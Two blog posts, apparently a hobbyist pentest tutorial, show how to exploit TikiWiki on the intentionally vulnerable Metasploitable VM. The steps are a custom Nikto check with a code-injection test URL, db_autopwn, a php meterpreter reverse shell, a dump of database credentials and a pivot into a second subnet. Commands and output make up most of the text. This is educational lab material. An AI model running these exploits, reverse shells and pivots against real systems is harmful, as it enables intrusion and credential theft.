Sunday, November 28, 2010

Nikto + XMLRPC = autowpwn Metasploitable?

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

Preamble
This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

Requirements and Background

After attending a recent security conference, I wanted to learn a little more about Metasploit database logging, xmlrpc and integration with other tools.
What better way to learn then to hack something?
This exercise will walk trough setting up a postgres database in Metasploit, adding a custom check for a vulnerability in Nikto, writing Nikto results to the Metasploit database, and finally using db_autopwn to get a shell from the Nikto scan.


Process
First things first. Setting up the msf database.
In Metasploit, you will want to use postgress (or mysql) as your sql database. To check which driver is available in Metasploit, launch Metasploit
msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3
Assuming that postgres is available, create a db as per http://www.metasploit.com/redmine/projects/framework/wiki/Postgres_setup

It is possible to have other applications write to the database is to use the xmlrpc interface of Metasploit.
For more information on this see http://blog.happypacket.net/, and watch Ryan's video from Defcon 18.
msf > load xmlrpc Pass=password123 ServerType=Web[*] XMLRPC Service:  127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: password123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc

This sets up the web xmlrpc interface running on port 55553.
Now, in order to do the autopwn, we have to add our own test for a vulnerability that we know Metasploitable is susceptible to into Nikto.

We will use the same vulnerability in the previous exercise, the tikiwiki_graph_formula_exec.

Let's look at this exploit a little deeper.
There are two ways to figure out how to detect the vulnerability. First let's look at the code for the exploit itself nano /pentest/exploits/framework3/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
This looks like the place it happens
        # This function will build a fairly randomish query string to be used
        # when exploiting this vulnerability :)
        #
       def build_uri(f_val)
                uri = ''
                uri << datastore['URI']
                uri << "/tiki-graph_formula.php?"
.... and we could dissect this a little further in order to build the http request to check for the vulnerability,
but there is an easier way. Instead lets look at the description for the exploit.
msf> info unix/webapp/tikiwiki_graph_formula_exec       Name: TikiWiki tiki-graph_formula Remote PHP Code Execution
      Version: 10394
      Platform: PHP
.... removed to shorten post 
Description:
  TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker
  to execute arbitrary PHP code. The issue is due to
  'tiki-graph_formula.php' script not properly sanitizing user input
  supplied to create_function(), which may allow a remote attacker to
  execute arbitrary PHP code resulting in a loss of integrity.
References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5423
  http://www.osvdb.org/40478
  http://www.securityfocus.com/bid/26006
Following the osvdb link there plain as day is a manual test string that we can use in Nikto.

The new string will need to be added to the db_tests file in your Nikto/Plugins directory. After you make sure you have a backup file, add a line like

"006XXX","40478","b","/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=","GET","200","","","","","This device may hav a vulnerable installation of TikiWiki.","",""
where 006xxx is the one number greater then the last entry in your db_test file. 40478 is the osvdb number. This will be important for db_autopwn.
Save the file and then launch Nikto.

./nikto.pl -host http://10.13.37.245 -Format msf -o msf:password123@http://localhost:55553/RPC2

 (make sure you type the same username and password as when you setup the xmlrpc listener)

All of the scan results are saved in the msf database in realtime.
msf > db_hosts
Hosts
=====
address       address6  arch  comm  comments  created_at                    info  mac  name          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at                    svcs  vulns  workspace
-------       --------  ----  ----  --------  ----------                    ----  ---  ----          ---------  -------  -------  -----  -------  -----  ----------                    ----  -----  ---------
10.13.37.245                                  Tue Nov 09 03:04:25 UTC 2010        00:0C:29:FB:5A:11  10.13.37.245                                               alive  Wed Nov 10 00:23:09 UTC 2010  12    6      default

msf > db_vulns.....
[*] Time: Tue Nov 09 00:21:58 UTC 2010 Vuln: host=10.13.37.245 port=80 proto=tcp name=nikto.003584 refs=OSVDB-3233
[*] Time: Tue Nov 10 00:22:14 UTC 2010 Vuln: host=10.13.37.245 port=80 proto=tcp name=nikto.005988 refs=OSVDB-5292
[*] Time: Wed Nov 10 00:23:08 UTC 2010 Vuln: host=10.13.37.245 port=80 proto=tcp name=nikto.006453 refs=OSVDB-40478
                   Notice how Nikto tested for and detected the tiki-wiki vulnerability.

Metasploits autopwn is a great thing to play around with and is great to help you make amazing demos, but if not used wisely it can get you into trouble. For this exercise, were going for the wow factor, so were going to use it.
msf> db_autopwn -x -e

[*] (1/1 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 10.13.37.245:80...
[*] (1/1 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] Command shell session 1 opened (10.13.37.136:33818 -> 10.13.37.245:17896) at Tue Nov 09 19:25:10 -0500 2010
msf> sessions -i 1[*] Starting interaction with 1...
ls /tmp5489.jsvc_up
uname -aLinux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

As you can see, we ran db_autopown with the -x (select based on vuln references) and-e (launch exploits) and were rewarded with a shell.

Next Steps
This was just a quick introduction, and I have a lot more to learn about Metasploit's database and xmlrpc support, so stay tuned for more

Tuesday, November 9, 2010

Metasploit on the edge Part 6 - Were not quite done yet...

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

Preamble

This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

This exercise is going to demonstrate how to use an "external" web application exploit rather then a client exploit to get the initial toe hold and an introduction to the php meterpreter.

Requirements and Background

Please review the previous posts. This exercise builds on some of the lessons learned.

Process

We start this post assuming that you have already done your recon and discovery to find a vulnerability that can be exploited. (always do recon first!)

This particular system has an vulnerability in the tikiwiki software. In fact, the server that we are exploiting (the metasploitable virtual machine available from metasploit.com) has multiple vulnerabilities.

msf use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > set rhost 10.13.37.245
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[*] Started reverse handler on 10.13.37.136:80
[*] Attempting to obtain database credentials...
[*] The server returned            : 200 OK
[*] Server version                 : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki   : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki  : tikiwiki195
[*] Attempting to execute our payload...
[*] Sending stage (29389 bytes) to 10.13.37.245
[*] Meterpreter session 3 opened (10.13.37.136:80 -> 10.13.37.245:47584) at 2010-11-03 18:57:55 -0400
Explanation - We set the exploit in Metasploit to use the tikiwiki graph exploit and used the php meterpreter payload. The php meterpreter is an amazing exploit, implementing many of the features of the standard meterpreter. See http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html for details on what is possible using php meterpreter,

Let's see what we got
meterpreter > sysinfo
Computer: metasploitable
OS      : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
after some more looking around look what we find
meterpreter > cat /var/lib/dhcp3/dhclient.leases
lease {
  interface "eth1";
  fixed-address 10.2.2.130;
  option subnet-mask 255.255.255.0;
  option dhcp-lease-time 1800;
  option dhcp-message-type 5;
  option domain-name-servers 10.2.2.1;
  option dhcp-server-identifier 10.2.2.254;
  option broadcast-address 10.2.2.255;
  option domain-name "localdomain";
  rebind 3 2010/11/3 23:34:00;
  renew 3 2010/11/3 23:22:20;
  expire 3 2010/11/3 23:37:45;
}
Excellent, there is second nic attached to a different NIC.
We can use the same route commands and scanners as in part 3 to explore the new network

meterpreter> <ctrl> <z>
msf exploit(tikiwiki_graph_formula_exec) > route add 10.2.2.0 255.255.255.0 4
msf exploit(tikiwiki_graph_formula_exec) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.2.2.130
msf auxiliary(tcp) > show options
Module options:
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.2.2.130       yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
   VERBOSE      false            no        Display verbose output
msf auxiliary(tcp) > set ports 135-139,445
msf auxiliary(tcp) > run
[*] 10.2.2.129:135 - TCP OPEN
[*] 10.2.2.129:139 - TCP OPEN
[*] 10.2.2.129:445 - TCP OPEN

Interesting note. In previous exercises, I have typed exploit, not run. It turns out proper protocol is to use run when your auxiliary tools, exploit for exploits, although for now, exploit is aliased to run.

As before, we can now try some exploits against this new host, pivoting through the web server.

The end....again.....for now....